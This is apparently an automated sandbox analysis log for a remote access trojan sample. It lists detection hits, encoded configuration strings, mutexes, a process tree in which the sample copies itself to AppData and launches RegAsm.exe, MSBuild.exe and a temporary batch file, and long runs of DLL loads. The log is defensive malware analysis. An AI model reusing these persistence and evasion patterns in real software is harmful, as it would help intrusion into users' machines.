                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Settings.csBase64 encoded string: 'Sp65M8DLwuq4BU7Gsx3V+X5ZW7m1aTC5Ghy7XdYmQy9tQj9kSKKK9aHO1jeqrA/5', 'or6LqS/zZS8CQvePyg/fgJMe0yqIMkQbW316vPDYq3aqgQsmRjCg7wcG8DY0NOtY'
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Settings.csBase64 encoded string: 'Sp65M8DLwuq4BU7Gsx3V+X5ZW7m1aTC5Ghy7XdYmQy9tQj9kSKKK9aHO1jeqrA/5', 'or6LqS/zZS8CQvePyg/fgJMe0yqIMkQbW316vPDYq3aqgQsmRjCg7wcG8DY0NOtY'
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Settings.csBase64 encoded string: 'Sp65M8DLwuq4BU7Gsx3V+X5ZW7m1aTC5Ghy7XdYmQy9tQj9kSKKK9aHO1jeqrA/5', 'or6LqS/zZS8CQvePyg/fgJMe0yqIMkQbW316vPDYq3aqgQsmRjCg7wcG8DY0NOtY'
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Settings.csBase64 encoded string: 'Sp65M8DLwuq4BU7Gsx3V+X5ZW7m1aTC5Ghy7XdYmQy9tQj9kSKKK9aHO1jeqrA/5', 'or6LqS/zZS8CQvePyg/fgJMe0yqIMkQbW316vPDYq3aqgQsmRjCg7wcG8DY0NOtY'
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/5@5/4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeFile created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\fqBMBb6BGV8IyaV6
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeMutant created: \Sessions\1\BaseNamedObjects\AutoStartupInstanceMutex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB64.tmp.bat""
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeVirustotal: Detection: 39%
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeReversingLabs: Detection: 33%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB64.tmp.bat""
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
